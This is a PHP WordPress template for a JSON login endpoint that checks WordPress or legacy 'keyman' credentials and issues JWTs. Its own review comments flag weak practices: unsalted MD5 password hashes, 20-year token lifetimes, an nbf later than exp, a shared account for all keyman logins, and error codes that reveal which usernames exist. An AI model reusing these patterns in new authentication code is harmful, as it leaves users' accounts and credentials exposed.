File: /var/www/doco2/wp-content/themes/ormedia/page-api-login.php
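<?php
/**
 * Template Name: api-login
 *
 * JSON login endpoint for the keylab admin app.
 *
 * Input (request parameters):
 *   login, password  – credentials (required; missing → rc -1)
 *   keyman           – when present, authenticate against the legacy
 *                      `keyman_user` table instead of WordPress
 *   new_psw          – optional, keyman only: replace the stored password
 *
 * Output: a JSON object with `rc`/`msg` (codes registered below), a JWT in
 * `token`, and per-user metadata. Note that get_header() emits theme markup
 * before the JSON, exactly as the original template did.
 */
// ini_set('display_errors',1);
get_header();
require_once('token.php');
require_once('JwtAuthClass.php');

// Result codes are registered as constants whose *names* are the translated
// labels, so `constant(__('…'))` and `__('…')` give matching code/message pairs.
define(__('URL parameter missing', 'orm_keylab' ), -1);
define(__('Username not exist', 'orm_keylab' ), -2);
define(__('Password incorrect', 'orm_keylab' ), -3);
define(__('Success', 'orm_keylab' ), 1);
define(__('Unknown failure', 'orm_keylab' ), -4);

//INPUT — read with isset() so a missing parameter is '' instead of a notice.
$username       = isset($_REQUEST['login']) ? $_REQUEST['login'] : '';
$password       = isset($_REQUEST['password']) ? $_REQUEST['password'] : '';
$is_keyman_user = isset($_REQUEST['keyman']);

$rv          = new stdClass();
$rv->rc      = 0;
$rv->msg     = "";
$login_error = false;
$user        = false; // WP_User, WP_Error, or false (account not found)

if (!empty($username) && !empty($password)) {
    if ($is_keyman_user) {
        // The legacy table stores unsalted MD5. Kept so existing rows keep
        // working; a migration to password_hash()/password_verify() is the
        // real fix. Both values go through $wpdb->prepare(), never interpolated.
        $psw         = md5($password);
        $keyman_user = $wpdb->get_row($wpdb->prepare(
            "SELECT id, uid, username FROM keyman_user WHERE username = %s AND password = %s",
            $username,
            $psw
        ));

        if (!empty($keyman_user)) {
            $rv->keyman_user = $keyman_user;
            $uid  = $keyman_user->uid;
            $unit = $wpdb->get_row($wpdb->prepare(
                "SELECT * FROM keylab_property_unit_list WHERE unit_id = %d",
                $uid
            ));
            // A keyman row without a unit row must not fatal on ->property_id.
            $pid = ($unit !== null) ? $unit->property_id : null;
            if ($unit !== null) {
                $unit->pid = $pid;
            }
            $property = $wpdb->get_row($wpdb->prepare(
                "SELECT property_id, name_zh, name_en FROM `keylab_property` WHERE property_id = %d",
                $pid
            ));
            $rv->property    = $property;
            $rv->unit        = $unit;
            $rv->property_id = $pid;
            $rv->pid         = $pid;

            // Every keyman login is mapped onto the single WordPress account
            // "keyman" — presumably a shared service account; confirm intended.
            $user = get_user_by("login", "keyman");

            if (isset($_REQUEST['new_psw'])) {
                $new_psw = $_REQUEST['new_psw'];
                if (strlen($new_psw) > 6) {
                    $updated = $wpdb->update(
                        "keyman_user",
                        array("password" => md5($new_psw)),
                        array('id' => $keyman_user->id)
                    );
                    // $wpdb->update() returns false when the query fails; the
                    // previous check of $wpdb->error never reflected that.
                    if ($updated !== false) {
                        $rv->status = 1;
                        $rv->msg    = "密碼更改成功";
                    } else {
                        $rv->status = -3;
                        $rv->msg    = "密碼更改失敗";
                    }
                } else {
                    $rv->status = -1;
                    $rv->msg    = "新密碼長度不足";
                }
            }
        } else {
            $rv->rc      = -3;
            $rv->status  = -2;
            $rv->msg     = "密碼錯誤";
            $login_error = true;
        }
    } else {
        // No fixed override password: every WordPress login must pass
        // wp_signon(), which is the only place credentials are verified.
        $creds = array(
            'user_login'    => $username,
            'user_password' => $password,
            'remember'      => false,
        );
        $user = wp_signon($creds, false);
    }

    // get_user_by() returns false for a missing account; treat it as a failure
    // rather than dereferencing ->ID on false.
    if ($user && !is_wp_error($user) && !$login_error) {
        wp_set_current_user($user->ID, $user->user_login);
        wp_set_auth_cookie($user->ID);
        do_action('wp_login', $user->user_login, $user);

        $now         = time();
        $payload_new = array(
            'iss' => 'keylab',
            'iat' => $now,                                          // issued at
            'exp' => $now + 3600 * 24 * 365 * 20,                   // expiry (20 years)
            'nbf' => $now + 3600 * 24 * 365 * 20 + 3600 * 24 * 7,   // refresh point, as used by JwtAuthClass
            // NOTE(review): nbf lies *after* exp; standard JWT semantics would
            // make this token never valid — confirm JwtAuthClass::verifyToken's
            // interpretation before changing either value.
            'sub' => 'keylab.cc',
            'jti' => md5(uniqid('JWT') . $now),                     // token identifier
        );
        $token_new = JwtAuthClass::getToken($payload_new);

        // Reuse the stored token while it still verifies; otherwise rotate it
        // and keep the old one flagged (last argument true) via insert_token().
        $old_token = r_token($user->ID, 0);
        if (!empty($old_token)) {
            if (JwtAuthClass::verifyToken($old_token->token) == 1) {
                $rv->token = $old_token->token;
            } else {
                insert_token($user->ID, 0, $token_new, false);
                insert_token($user->ID, 0, $old_token->token, true);
                $rv->token = $token_new;
            }
        } else {
            insert_token($user->ID, 0, $token_new, false);
            $rv->token = $token_new;
        }

        // NOTE(review): session_start() is not called in this template; the
        // session is presumably opened earlier in the request — verify.
        $_SESSION['token'] = $rv->token;

        // change_pass asks the client to force a password change when the
        // current one fails the strength rule (8–20 chars, letters and digits).
        $rv->change_pass = !preg_match('/^(?![^a-zA-Z]+$)(?!\D+$).{8,20}$/', $password);

        $relate_wp_id         = get_user_meta($user->ID, 'relate_wp_id');
        $rv->real_wp_id       = $user->ID;
        $rv->company_name     = get_user_meta($user->ID, 'nickname', true);
        $rv->user_email       = $user->user_email;
        // A user with no relate_wp_id meta is their own admin account.
        $rv->admin_wp_id      = count($relate_wp_id) == 0 ? $user->ID : $relate_wp_id[0];
        $rv->real_property_id = $rv->admin_wp_id == $rv->real_wp_id ? 'all' : get_real_property_id($user->ID);
        if (count($relate_wp_id) == 0) {
            $rv->can_delete_property = '1';
        } else {
            $rv->can_delete_property = get_user_meta($user->ID, 'can_delete_property', true);
        }

        if (!$is_keyman_user) {
            $rv->msg = __('Success', 'orm_keylab' );
            $rv->rc  = constant(__('Success', 'orm_keylab' ));
        }
        //log
        keylab_login_log($user->ID, $rv->admin_wp_id);
    } else {
        if (!$is_keyman_user) {
            $rv->rc  = constant(__('Unknown failure', 'orm_keylab' ));
            $rv->msg = __('Unknown failure', 'orm_keylab' );
            // $user may be false (no WP_Error to read a message from).
            $error_message = is_wp_error($user) ? $user->get_error_message() : '';
            // NOTE(review): returning distinct codes for "no such user" and
            // "wrong password" lets a caller probe which usernames exist.
            if (strpos($error_message, 'Invalid') !== false) {
                $rv->rc  = constant(__('Username not exist', 'orm_keylab' ));
                $rv->msg = __('Username not exist', 'orm_keylab' );
            } elseif (strpos($error_message, 'incorrect') !== false) {
                $rv->rc  = constant(__('Password incorrect', 'orm_keylab' ));
                $rv->msg = __('Password incorrect', 'orm_keylab' );
            }
        }
        // Echo the request back for diagnostics, but never the submitted
        // secrets — the response body ends up in logs and proxies.
        $debug = $_REQUEST;
        unset($debug['password'], $debug['new_psw']);
        $rv->debug = $debug;
    }
} else {
    $rv->rc  = constant(__('URL parameter missing', 'orm_keylab' ));
    $rv->msg = __('URL parameter missing', 'orm_keylab' );
    // get_header() has normally already sent output, so the redirect only takes
    // effect when nothing has been flushed; the guard avoids the
    // "headers already sent" warning in the common case.
    if (!headers_sent()) {
        header("Location:http://keylab.cc/admin");
    }
}

echo json_encode($rv);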